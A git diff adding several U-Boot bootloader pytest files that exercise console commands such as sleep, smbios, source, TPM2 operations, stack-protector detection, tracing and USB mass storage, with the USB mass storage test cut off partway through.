a/test/py/tests/test_sleep.py b/test/py/tests/test_sleep.py new file mode 100644 index 00000000000..66a57434bff --- /dev/null +++ b/test/py/tests/test_sleep.py @@ -0,0 +1,61 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +import pytest +import time + +""" +Note: This test doesn't rely on boardenv_* configuration values but they can +change test behavior. + +# Setup env__sleep_accurate to False if time is not accurate on your platform +env__sleep_accurate = False + +# Setup env__sleep_time time in seconds board is set to sleep +env__sleep_time = 3 + +# Setup env__sleep_margin set a margin for any system overhead +env__sleep_margin = 0.25 + +""" + +def test_sleep(u_boot_console): + """Test the sleep command, and validate that it sleeps for approximately + the correct amount of time.""" + + sleep_skip = u_boot_console.config.env.get('env__sleep_accurate', True) + if not sleep_skip: + pytest.skip('sleep is not accurate') + + if u_boot_console.config.buildconfig.get('config_cmd_misc', 'n') != 'y': + pytest.skip('sleep command not supported') + + # 3s isn't too long, but is enough to cross a few second boundaries. + sleep_time = u_boot_console.config.env.get('env__sleep_time', 3) + sleep_margin = u_boot_console.config.env.get('env__sleep_margin', 0.25) + tstart = time.time() + u_boot_console.run_command('sleep %d' % sleep_time) + tend = time.time() + elapsed = tend - tstart + assert elapsed >= (sleep_time - 0.01) + if not u_boot_console.config.gdbserver: + # margin is hopefully enough to account for any system overhead. + assert elapsed < (sleep_time + sleep_margin) + +@pytest.mark.buildconfigspec("cmd_misc") +def test_time(u_boot_console): + """Test the time command, and validate that it gives approximately the + correct amount of command execution time.""" + + sleep_skip = u_boot_console.config.env.get("env__sleep_accurate", True) + if not sleep_skip: + pytest.skip("sleep is not accurate") + + sleep_time = u_boot_console.config.env.get("env__sleep_time", 10) + sleep_margin = u_boot_console.config.env.get("env__sleep_margin", 0.25) + output = u_boot_console.run_command("time sleep %d" % sleep_time) + execute_time = float(output.split()[1]) + assert sleep_time >= (execute_time - 0.01) + if not u_boot_console.config.gdbserver: + # margin is hopefully enough to account for any system overhead. + assert sleep_time < (execute_time + sleep_margin) diff --git a/test/py/tests/test_smbios.py b/test/py/tests/test_smbios.py new file mode 100644 index 00000000000..82b0b689830 --- /dev/null +++ b/test/py/tests/test_smbios.py @@ -0,0 +1,41 @@ +# SPDX-License-Identifier: GPL-2.0-or-later + +"""Test smbios command""" + +import pytest + +@pytest.mark.buildconfigspec('cmd_smbios') +@pytest.mark.notbuildconfigspec('qfw_smbios') +@pytest.mark.notbuildconfigspec('sandbox') +def test_cmd_smbios(u_boot_console): + """Run the smbios command""" + output = u_boot_console.run_command('smbios') + assert 'DMI type 127,' in output + +@pytest.mark.buildconfigspec('cmd_smbios') +@pytest.mark.buildconfigspec('qfw_smbios') +@pytest.mark.notbuildconfigspec('sandbox') +# TODO: +# QEMU v8.2.0 lacks SMBIOS support for RISC-V +# Once support is available in our Docker image we can remove the constraint. +@pytest.mark.notbuildconfigspec('riscv') +def test_cmd_smbios_qemu(u_boot_console): + """Run the smbios command on QEMU""" + output = u_boot_console.run_command('smbios') + assert 'DMI type 1,' in output + assert 'Manufacturer: QEMU' in output + assert 'DMI type 127,' in output + +@pytest.mark.buildconfigspec('cmd_smbios') +@pytest.mark.buildconfigspec('sandbox') +def test_cmd_smbios_sandbox(u_boot_console): + """Run the smbios command on the sandbox""" + output = u_boot_console.run_command('smbios') + assert 'DMI type 0,' in output + assert 'String 1: U-Boot' in output + assert 'DMI type 1,' in output + assert 'Manufacturer: sandbox' in output + assert 'DMI type 2,' in output + assert 'DMI type 3,' in output + assert 'DMI type 4,' in output + assert 'DMI type 127,' in output diff --git a/test/py/tests/test_source.py b/test/py/tests/test_source.py new file mode 100644 index 00000000000..bbc311df6d1 --- /dev/null +++ b/test/py/tests/test_source.py @@ -0,0 +1,37 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (C) 2022 Sean Anderson <sean.anderson@seco.com> + +import os +import pytest +import u_boot_utils as util + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('cmd_source') +@pytest.mark.buildconfigspec('fit') +def test_source(u_boot_console): + # Compile our test script image + cons = u_boot_console + mkimage = os.path.join(cons.config.build_dir, 'tools/mkimage') + its = os.path.join(cons.config.source_dir, 'test/py/tests/source.its') + fit = os.path.join(cons.config.build_dir, 'source.itb') + util.run_and_log(cons, (mkimage, '-f', its, fit)) + cons.run_command(f'host load hostfs - $loadaddr {fit}') + + assert '2' in cons.run_command('source') + assert '1' in cons.run_command('source :') + assert '1' in cons.run_command('source :script-1') + assert '2' in cons.run_command('source :script-2') + assert 'Fail' in cons.run_command('source :not-a-script || echo Fail') + assert '2' in cons.run_command('source \\#') + assert '1' in cons.run_command('source \\#conf-1') + assert '2' in cons.run_command('source \\#conf-2') + + cons.run_command('fdt addr $loadaddr') + cons.run_command('fdt rm /configurations default') + assert '1' in cons.run_command('source') + assert 'Fail' in cons.run_command('source \\# || echo Fail') + + cons.run_command('fdt rm /images default') + assert 'Fail' in cons.run_command('source || echo Fail') + assert 'Fail' in cons.run_command('source \\# || echo Fail') diff --git a/test/py/tests/test_spl.py b/test/py/tests/test_spl.py new file mode 100644 index 00000000000..42e4c4342b2 --- /dev/null +++ b/test/py/tests/test_spl.py @@ -0,0 +1,44 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2020 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +import os.path +import pytest + +@pytest.mark.buildconfigspec('spl_unit_test') +def test_ut_spl_init(u_boot_console): + """Initialize data for ut spl tests.""" + + fn = u_boot_console.config.source_dir + '/spi.bin' + if not os.path.exists(fn): + data = b'\x00' * (2 * 1024 * 1024) + with open(fn, 'wb') as fh: + fh.write(data) + +def test_spl(u_boot_console, ut_spl_subtest): + """Execute a "ut" subtest. + + The subtests are collected in function generate_ut_subtest() from linker + generated lists by applying a regular expression to the lines of file + spl/u-boot-spl.sym. The list entries are created using the C macro + UNIT_TEST(). + + Strict naming conventions have to be followed to match the regular + expression. Use UNIT_TEST(foo_test_bar, _flags, foo_test) for a test bar in + test suite foo that can be executed via command 'ut foo bar' and is + implemented in C function foo_test_bar(). + + Args: + u_boot_console (ConsoleBase): U-Boot console + ut_subtest (str): SPL test to be executed (e.g. 'dm platdata_phandle') + """ + try: + cons = u_boot_console + cons.restart_uboot_with_flags(['-u', '-k', ut_spl_subtest.split()[1]]) + output = cons.get_spawn_output().replace('\r', '') + assert 'Failures: 0' in output + finally: + # Restart afterward in case a non-SPL test is run next. This should not + # happen since SPL tests are run in their own invocation of test.py, but + # the cost of doing this is not too great at present. + u_boot_console.restart_uboot() diff --git a/test/py/tests/test_stackprotector.py b/test/py/tests/test_stackprotector.py new file mode 100644 index 00000000000..b87392c54ff --- /dev/null +++ b/test/py/tests/test_stackprotector.py @@ -0,0 +1,15 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2021 Broadcom + +import pytest +import signal + +@pytest.mark.buildconfigspec('cmd_stackprotector_test') +@pytest.mark.notbuildconfigspec('asan') +def test_stackprotector(u_boot_console): + """Test that the stackprotector function works.""" + + u_boot_console.run_command('stackprot_test',wait_for_prompt=False) + expected_response = 'Stack smashing detected' + u_boot_console.wait_for(expected_response) + u_boot_console.restart_uboot() diff --git a/test/py/tests/test_tpm2.py b/test/py/tests/test_tpm2.py new file mode 100644 index 00000000000..1d654cd4a23 --- /dev/null +++ b/test/py/tests/test_tpm2.py @@ -0,0 +1,318 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Bootlin +# Author: Miquel Raynal <miquel.raynal@bootlin.com> + +import os.path +import pytest +import u_boot_utils +import re +import time + +""" +Test the TPMv2.x related commands. You must have a working hardware setup in +order to do these tests. + +Notes: +* These tests will prove the password mechanism. The TPM chip must be cleared of +any password. +* Commands like pcr_setauthpolicy and pcr_resetauthpolicy are not implemented +here because they would fail the tests in most cases (TPMs do not implement them +and return an error). + + +Note: +This test doesn't rely on boardenv_* configuration value but can change test +behavior. + +* Setup env__tpm_device_test_skip to True if tests with TPM devices should be +skipped. + +""" + +updates = 0 + +def force_init(u_boot_console, force=False): + """When a test fails, U-Boot is reset. Because TPM stack must be initialized + after each reboot, we must ensure these lines are always executed before + trying any command or they will fail with no reason. Executing 'tpm init' + twice will spawn an error used to detect that the TPM was not reset and no + initialization code should be run. + """ + skip_test = u_boot_console.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + output = u_boot_console.run_command('tpm2 autostart') + if force or not 'Error' in output: + u_boot_console.run_command('echo --- start of init ---') + u_boot_console.run_command('tpm2 clear TPM2_RH_LOCKOUT') + output = u_boot_console.run_command('echo $?') + if not output.endswith('0'): + u_boot_console.run_command('tpm2 clear TPM2_RH_PLATFORM') + u_boot_console.run_command('echo --- end of init ---') + +def is_sandbox(cons): + # Array slice removes leading/trailing quotes. + sys_arch = cons.config.buildconfig.get('config_sys_arch', '"sandbox"')[1:-1] + return sys_arch == 'sandbox' + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_init(u_boot_console): + """Init the software stack to use TPMv2 commands.""" + skip_test = u_boot_console.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + u_boot_console.run_command('tpm2 autostart') + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_startup(u_boot_console): + """Execute a TPM2_Startup command. + + Initiate the TPM internal state machine. + """ + skip_test = u_boot_console.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + u_boot_console.run_command('tpm2 startup TPM2_SU_CLEAR') + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +def tpm2_sandbox_init(u_boot_console): + """Put sandbox back into a known state so we can run a test + + This allows all tests to run in parallel, since no test depends on another. + """ + u_boot_console.restart_uboot() + u_boot_console.run_command('tpm2 autostart') + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + skip_test = u_boot_console.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_sandbox_self_test_full(u_boot_console): + """Execute a TPM2_SelfTest (full) command. + + Ask the TPM to perform all self tests to also enable full capabilities. + """ + if is_sandbox(u_boot_console): + u_boot_console.restart_uboot() + u_boot_console.run_command('tpm2 autostart') + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + u_boot_console.run_command('tpm2 startup TPM2_SU_CLEAR') + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + skip_test = u_boot_console.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + u_boot_console.run_command('tpm2 self_test full') + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_continue_self_test(u_boot_console): + """Execute a TPM2_SelfTest (continued) command. + + Ask the TPM to finish its self tests (alternative to the full test) in order + to enter a fully operational state. + """ + + skip_test = u_boot_console.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + if is_sandbox(u_boot_console): + tpm2_sandbox_init(u_boot_console) + u_boot_console.run_command('tpm2 self_test continue') + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_clear(u_boot_console): + """Execute a TPM2_Clear command. + + Ask the TPM to reset entirely its internal state (including internal + configuration, passwords, counters and DAM parameters). This is half of the + TAKE_OWNERSHIP command from TPMv1. + + Use the LOCKOUT hierarchy for this. The LOCKOUT/PLATFORM hierarchies must + not have a password set, otherwise this test will fail. ENDORSEMENT and + PLATFORM hierarchies are also available. + """ + if is_sandbox(u_boot_console): + tpm2_sandbox_init(u_boot_console) + + skip_test = u_boot_console.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + u_boot_console.run_command('tpm2 clear TPM2_RH_LOCKOUT') + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + u_boot_console.run_command('tpm2 clear TPM2_RH_PLATFORM') + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_change_auth(u_boot_console): + """Execute a TPM2_HierarchyChangeAuth command. + + Ask the TPM to change the owner, ie. set a new password: 'unicorn' + + Use the LOCKOUT hierarchy for this. ENDORSEMENT and PLATFORM hierarchies are + also available. + """ + if is_sandbox(u_boot_console): + tpm2_sandbox_init(u_boot_console) + force_init(u_boot_console) + + u_boot_console.run_command('tpm2 change_auth TPM2_RH_LOCKOUT unicorn') + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + u_boot_console.run_command('tpm2 clear TPM2_RH_LOCKOUT unicorn') + output = u_boot_console.run_command('echo $?') + u_boot_console.run_command('tpm2 clear TPM2_RH_PLATFORM') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('sandbox') +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_get_capability(u_boot_console): + """Execute a TPM_GetCapability command. + + Display one capability. In our test case, let's display the default DAM + lockout counter that should be 0 since the CLEAR: + - TPM_CAP_TPM_PROPERTIES = 0x6 + - TPM_PT_LOCKOUT_COUNTER (1st parameter) = PTR_VAR + 14 + + There is no expected default values because it would depend on the chip + used. We can still save them in order to check they have changed later. + """ + if is_sandbox(u_boot_console): + tpm2_sandbox_init(u_boot_console) + + force_init(u_boot_console) + ram = u_boot_utils.find_ram_base(u_boot_console) + + read_cap = u_boot_console.run_command('tpm2 get_capability 0x6 0x20e 0x200 1') #0x%x 1' % ram) + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + assert 'Property 0x0000020e: 0x00000000' in read_cap + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_dam_parameters(u_boot_console): + """Execute a TPM2_DictionaryAttackParameters command. + + Change Dictionary Attack Mitigation (DAM) parameters. Ask the TPM to change: + - Max number of failed authentication before lockout: 3 + - Time before the failure counter is automatically decremented: 10 sec + - Time after a lockout failure before it can be attempted again: 0 sec + + For an unknown reason, the DAM parameters must be changed before changing + the authentication, otherwise the lockout will be engaged after the first + failed authentication attempt. + """ + if is_sandbox(u_boot_console): + tpm2_sandbox_init(u_boot_console) + force_init(u_boot_console) + ram = u_boot_utils.find_ram_base(u_boot_console) + + # Set the DAM parameters to known values + u_boot_console.run_command('tpm2 dam_parameters 3 10 0') + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + # Check the values have been saved + read_cap = u_boot_console.run_command('tpm2 get_capability 0x6 0x20f 0x%x 3' % ram) + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + assert 'Property 0x0000020f: 0x00000003' in read_cap + assert 'Property 0x00000210: 0x0000000a' in read_cap + assert 'Property 0x00000211: 0x00000000' in read_cap + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_pcr_read(u_boot_console): + """Execute a TPM2_PCR_Read command. + + Perform a PCR read of the 10th PCR. Must be zero. + """ + if is_sandbox(u_boot_console): + tpm2_sandbox_init(u_boot_console) + + force_init(u_boot_console) + ram = u_boot_utils.find_ram_base(u_boot_console) + + read_pcr = u_boot_console.run_command('tpm2 pcr_read 10 0x%x' % ram) + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + # Save the number of PCR updates + str = re.findall(r'\d+ known updates', read_pcr)[0] + global updates + updates = int(re.findall(r'\d+', str)[0]) + + # Check the output value + assert 'PCR #10 content' in read_pcr + assert '00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00' in read_pcr + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_pcr_extend(u_boot_console): + """Execute a TPM2_PCR_Extend command. + + Perform a PCR extension with a known hash in memory (zeroed since the board + must have been rebooted). + + No authentication mechanism is used here, not protecting against packet + replay, yet. + """ + if is_sandbox(u_boot_console): + tpm2_sandbox_init(u_boot_console) + force_init(u_boot_console) + ram = u_boot_utils.find_ram_base(u_boot_console) + + read_pcr = u_boot_console.run_command('tpm2 pcr_read 10 0x%x' % (ram + 0x20)) + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + str = re.findall(r'\d+ known updates', read_pcr)[0] + updates = int(re.findall(r'\d+', str)[0]) + + u_boot_console.run_command('tpm2 pcr_extend 10 0x%x' % ram) + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + # Read the value back into a different place so we can still use 'ram' as + # our zero bytes + read_pcr = u_boot_console.run_command('tpm2 pcr_read 10 0x%x' % (ram + 0x20)) + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + assert 'f5 a5 fd 42 d1 6a 20 30 27 98 ef 6e d3 09 97 9b' in read_pcr + assert '43 00 3d 23 20 d9 f0 e8 ea 98 31 a9 27 59 fb 4b' in read_pcr + + str = re.findall(r'\d+ known updates', read_pcr)[0] + new_updates = int(re.findall(r'\d+', str)[0]) + assert (updates + 1) == new_updates + + u_boot_console.run_command('tpm2 pcr_extend 10 0x%x' % ram) + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + read_pcr = u_boot_console.run_command('tpm2 pcr_read 10 0x%x' % (ram + 0x20)) + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + assert '7a 05 01 f5 95 7b df 9c b3 a8 ff 49 66 f0 22 65' in read_pcr + assert 'f9 68 65 8b 7a 9c 62 64 2c ba 11 65 e8 66 42 f5' in read_pcr + + str = re.findall(r'\d+ known updates', read_pcr)[0] + new_updates = int(re.findall(r'\d+', str)[0]) + assert (updates + 2) == new_updates + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_cleanup(u_boot_console): + """Ensure the TPM is cleared from password or test related configuration.""" + + force_init(u_boot_console, True) diff --git a/test/py/tests/test_trace.py b/test/py/tests/test_trace.py new file mode 100644 index 00000000000..7c5696ce747 --- /dev/null +++ b/test/py/tests/test_trace.py @@ -0,0 +1,306 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2022 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +import os +import pytest +import re + +import u_boot_utils as util + +# This is needed for Azure, since the default '..' directory is not writeable +TMPDIR = '/tmp/test_trace' + +# Decode a function-graph line +RE_LINE = re.compile(r'.*0\.\.\.\.\. \s*([0-9.]*): func.*[|](\s*)(\S.*)?([{};])$') + + +def collect_trace(cons): + """Build U-Boot and run it to collect a trace + + Args: + cons (ConsoleBase): U-Boot console + + Returns: + tuple: + str: Filename of the output trace file + int: Microseconds taken for initf_dm according to bootstage + """ + cons.run_command('trace pause') + out = cons.run_command('trace stats') + + # The output is something like this: + # 251,003 function sites + # 1,160,283 function calls + # 0 untracked function calls + # 1,230,758 traced function calls (341538 dropped due to overflow) + # 33 maximum observed call depth + # 15 call depth limit + # 748,268 calls not traced due to depth + # 1,230,758 max function calls + + # Get a dict of values from the output + lines = [line.split(maxsplit=1) for line in out.splitlines() if line] + vals = {key: val.replace(',', '') for val, key in lines} + + assert int(vals['function sites']) > 100000 + assert int(vals['function calls']) > 200000 + assert int(vals['untracked function calls']) == 0 + assert int(vals['maximum observed call depth']) > 30 + assert (vals['call depth limit'] == + cons.config.buildconfig.get('config_trace_call_depth_limit')) + assert int(vals['calls not traced due to depth']) > 100000 + + out = cons.run_command('bootstage report') + # Accumulated time: + # 19,104 dm_r + # 23,078 of_live + # 46,280 dm_f + dm_f_time = [line.split()[0] for line in out.replace(',', '').splitlines() + if 'dm_f' in line] + + # Read out the trace data + addr = 0x02000000 + size = 0x02000000 + out = cons.run_command(f'trace calls {addr:x} {size:x}') + print(out) + fname = os.path.join(TMPDIR, 'trace') + out = cons.run_command( + 'host save hostfs - %x %s ${profoffset}' % (addr, fname)) + return fname, int(dm_f_time[0]) + + +def check_function(cons, fname, proftool, map_fname, trace_dat): + """Check that the 'function' output works + + Args: + cons (ConsoleBase): U-Boot console + fname (str): Filename of trace file + proftool (str): Filename of proftool + map_fname (str): Filename of System.map + trace_dat (str): Filename of output file + """ + out = util.run_and_log( + cons, [proftool, '-t', fname, '-o', trace_dat, '-m', map_fname, + 'dump-ftrace']) + + # Check that trace-cmd can read it + out = util.run_and_log(cons, ['trace-cmd', 'dump', trace_dat]) + + # Tracing meta data in file /tmp/test_trace/trace.dat: + # [Initial format] + # 6 [Version] + # 0 [Little endian] + # 4 [Bytes in a long] + # 4096 [Page size, bytes] + # [Header page, 205 bytes] + # [Header event, 205 bytes] + # [Ftrace format, 3 events] + # [Events format, 0 systems] + # [Kallsyms, 342244 bytes] + # [Trace printk, 0 bytes] + # [Saved command lines, 9 bytes] + # 1 [CPUs with tracing data] + # [6 options] + # [Flyrecord tracing data] + # [Tracing clock] + # [local] global counter uptime perf mono mono_raw boot x86-tsc + assert '[Flyrecord tracing data]' in out + assert '4096 [Page size, bytes]' in out + kallsyms = [line.split() for line in out.splitlines() if 'Kallsyms' in line] + # [['[Kallsyms,', '342244', 'bytes]']] + val = int(kallsyms[0][1]) + assert val > 50000 # Should be at least 50KB of symbols + + # Check that the trace has something useful + cmd = f"trace-cmd report -l {trace_dat} |grep -E '(initf_|initr_)'" + out = util.run_and_log(cons, ['sh', '-c', cmd]) + + # Format: + # u-boot-1 0..... 60.805596: function: initf_malloc + # u-boot-1 0..... 60.805597: function: initf_malloc + # u-boot-1 0..... 60.805601: function: initf_bootstage + # u-boot-1 0..... 60.805607: function: initf_bootstage + + lines = [line.replace(':', '').split() for line in out.splitlines()] + vals = {items[4]: float(items[2]) for items in lines if len(items) == 5} + base = None + max_delta = 0 + for timestamp in vals.values(): + if base: + max_delta = max(max_delta, timestamp - base) + else: + base = timestamp + + # Check for some expected functions + assert 'initf_malloc' in vals.keys() + assert 'initr_watchdog' in vals.keys() + assert 'initr_dm' in vals.keys() + + # All the functions should be executed within five seconds at most + assert max_delta < 5 + + +def check_funcgraph(cons, fname, proftool, map_fname, trace_dat): + """Check that the 'funcgraph' output works + + Args: + cons (ConsoleBase): U-Boot console + fname (str): Filename of trace file + proftool (str): Filename of proftool + map_fname (str): Filename of System.map + trace_dat (str): Filename of output file + + Returns: + int: Time taken by the first part of the initf_dm() function, in us + """ + + # Generate the funcgraph format + out = util.run_and_log( + cons, [proftool, '-t', fname, '-o', trace_dat, '-m', map_fname, + 'dump-ftrace', '-f', 'funcgraph']) + + # Check that the trace has what we expect + cmd = f'trace-cmd report -l {trace_dat} |head -n 70' + out = util.run_and_log(cons, ['sh', '-c', cmd]) + + # First look for this: + # u-boot-1 0..... 282.101360: funcgraph_entry: 0.004 us | initf_malloc(); + # ... + # u-boot-1 0..... 282.101369: funcgraph_entry: | initf_bootstage() { + # u-boot-1 0..... 282.101369: funcgraph_entry: | bootstage_init() { + # u-boot-1 0..... 282.101369: funcgraph_entry: | dlmalloc() { + # ... + # u-boot-1 0..... 282.101375: funcgraph_exit: 0.001 us | } + # Then look for this: + # u-boot-1 0..... 282.101375: funcgraph_exit: 0.006 us | } + # Then check for this: + # u-boot-1 0..... 282.101375: funcgraph_entry: 0.000 us | initcall_is_event(); + + expected_indent = None + found_start = False + found_end = False + upto = None + + # Look for initf_bootstage() entry and make sure we see the exit + # Collect the time for initf_dm() + for line in out.splitlines(): + m = RE_LINE.match(line) + if m: + timestamp, indent, func, brace = m.groups() + if found_end: + upto = func + break + elif func == 'initf_bootstage() ': + found_start = True + expected_indent = indent + ' ' + elif found_start and indent == expected_indent and brace == '}': + found_end = True + + # The next function after initf_bootstage() exits should be + # initcall_is_event() + assert upto == 'initcall_is_event()' + + # Now look for initf_dm() and dm_timer_init() so we can check the bootstage + # time + cmd = f"trace-cmd report -l {trace_dat} |grep -E '(initf_dm|dm_timer_init)'" + out = util.run_and_log(cons, ['sh', '-c', cmd]) + + start_timestamp = None + end_timestamp = None + for line in out.splitlines(): + m = RE_LINE.match(line) + if m: + timestamp, indent, func, brace = m.groups() + if func == 'initf_dm() ': + start_timestamp = timestamp + elif func == 'dm_timer_init() ': + end_timestamp = timestamp + break + assert start_timestamp and end_timestamp + + # Convert the time to microseconds + return int((float(end_timestamp) - float(start_timestamp)) * 1000000) + + +def check_flamegraph(cons, fname, proftool, map_fname, trace_fg): + """Check that the 'flamegraph' output works + + This spot checks a few call counts and estimates the time taken by the + initf_dm() function + + Args: + cons (ConsoleBase): U-Boot console + fname (str): Filename of trace file + proftool (str): Filename of proftool + map_fname (str): Filename of System.map + trace_fg (str): Filename of output file + + Returns: + int: Approximate number of microseconds used by the initf_dm() function + """ + + # Generate the flamegraph format + out = util.run_and_log( + cons, [proftool, '-t', fname, '-o', trace_fg, '-m', map_fname, + 'dump-flamegraph']) + + # We expect dm_timer_init() to be called twice: once before relocation and + # once after + look1 = 'initf_dm;dm_timer_init 1' + look2 = 'board_init_r;initcall_run_list;initr_dm_devices;dm_timer_init 1' + found = 0 + with open(trace_fg, 'r') as fd: + for line in fd: + line = line.strip() + if line == look1 or line == look2: + found += 1 + assert found == 2 + + # Generate the timing graph + out = util.run_and_log( + cons, [proftool, '-t', fname, '-o', trace_fg, '-m', map_fname, + 'dump-flamegraph', '-f', 'timing']) + + # Add up all the time spend in initf_dm() and its children + total = 0 + with open(trace_fg, 'r') as fd: + for line in fd: + line = line.strip() + if line.startswith('initf_dm'): + func, val = line.split() + count = int(val) + total += count + return total + +check_flamegraph +@pytest.mark.slow +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('trace') +def test_trace(u_boot_console): + """Test we can build sandbox with trace, collect and process a trace""" + cons = u_boot_console + + if not os.path.exists(TMPDIR): + os.mkdir(TMPDIR) + proftool = os.path.join(cons.config.build_dir, 'tools', 'proftool') + map_fname = os.path.join(cons.config.build_dir, 'System.map') + trace_dat = os.path.join(TMPDIR, 'trace.dat') + trace_fg = os.path.join(TMPDIR, 'trace.fg') + + fname, dm_f_time = collect_trace(cons) + + check_function(cons, fname, proftool, map_fname, trace_dat) + trace_time = check_funcgraph(cons, fname, proftool, map_fname, trace_dat) + + # Check that bootstage and funcgraph agree to within 10 microseconds + diff = abs(trace_time - dm_f_time) + print(f'trace_time {trace_time}, dm_f_time {dm_f_time}') + assert diff / dm_f_time < 0.01 + + fg_time = check_flamegraph(cons, fname, proftool, map_fname, trace_fg) + + # Check that bootstage and flamegraph agree to within 30% + # This allows for CI being slow to run + diff = abs(fg_time - dm_f_time) + assert diff / dm_f_time < 0.3 diff --git a/test/py/tests/test_ums.py b/test/py/tests/test_ums.py new file mode 100644 index 00000000000..749b1606235 --- /dev/null +++ b/test/py/tests/test_ums.py @@ -0,0 +1,236 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +# Test U-Boot's "ums" command. The test starts UMS in U-Boot, waits for USB +# device enumeration on the host, reads a small block of data from the UMS +# block device, optionally mounts a partition and performs filesystem-based +# read/write tests, and finally aborts the "ums" command in U-Boot. + +import os +import os.path +import pytest +import re +import time +import u_boot_utils + +""" +Note: This test relies on: + +a) boardenv_* to contain configuration values to define which USB ports are +available for testing. Without this, this test will be automatically skipped. +For example: + +# Leave this list empty if you have no block_devs below with writable +# partitions defined. +env__mount_points = ( + '/mnt/ubtest-mnt-p2371-2180-na', +) + +env__usb_dev_ports = ( + { + 'fixture_id': 'micro_b', + 'tgt_usb_ctlr': '0', + 'host_ums_dev_node': '/dev/disk/by-path/pci-0000:00:14.0-usb-0:13:1.0-scsi-0:0:0:0', + }, +) + +env__block_devs = ( + # eMMC; always present + { + 'fixture_id': 'emmc', + 'type': 'mmc', + 'id': '0', + # The following two properties are optional. + # If present, the partition will be mounted and a file written-to and + # read-from it. If missing, only a simple block read test will be + # performed. + 'writable_fs_partition': 1, + 'writable_fs_subdir': 'tmp/', + }, + # SD card; present since I plugged one in + { + 'fixture_id': 'sd', + 'type': 'mmc', + 'id': '1' + }, +) + +b) udev rules to set permissions on devices nodes, so that sudo is not +required. For example: + +ACTION=="add", SUBSYSTEM=="block", SUBSYSTEMS=="usb", KERNELS=="3-13", MODE:="666" + +(You may wish to change the group ID instead of setting the permissions wide +open. All that matters is that the user ID running the test can access the +device.) + +c) /etc/fstab entries to allow the block device to be mounted without requiring +root permissions. For example: + +/dev/disk/by-path/pci-0000:00:14.0-usb-0:13:1.0-scsi-0:0:0:0-part1 /mnt/ubtest-mnt-p2371-2180-na ext4 noauto,user,nosuid,nodev + +This entry is only needed if any block_devs above contain a +writable_fs_partition value. +""" + +@pytest.mark.buildconfigspec('cmd_usb_mass_storage') +def test_ums(u_boot_console, env__usb_dev_port, env__block_devs): + """Test the "ums" command; the host system must be able to enumerate a UMS + device when "ums" is running, block and optionally file I/O are tested, + and this device must disappear when "ums" is aborted. + + Args: + u_boot_console: A U-Boot console connection. + env__usb_dev_port: The single USB device-mode port specification on + which to run the test. See the file-level comment above for + details of the format. + env__block_devs: The list of block devices that the target U-Boot + device has attached. See the file-level comment above for details + of the format. + + Returns: + Nothing. + """ + + have_writable_fs_partition = 'writable_fs_partition' in env__block_devs[0] + if not have_writable_fs_partition: + # If 'writable_fs_subdir' is missing, we'll skip all parts of the + # testing which mount filesystems. + u_boot_console.log.warning( + 'boardenv missing "writable_fs_partition"; ' + + 'UMS testing will be limited.') + + tgt_usb_ctlr = env__usb_dev_port['tgt_usb_ctlr'] + host_ums_dev_node = env__usb_dev_port['host_ums_dev_node'] + + # We're interested in testing USB device mode on each port, not the cross- + # product of that with each device. So, just pick the first entry in the + # device list here. We'll test each block device somewhere else. + tgt_dev_type = env__block_devs[0]['type'] + tgt_dev_id = env__block_devs[0]['id'] + if have_writable_fs_partition: + mount_point = u_boot_console.config.env['env__mount_points'][0] + 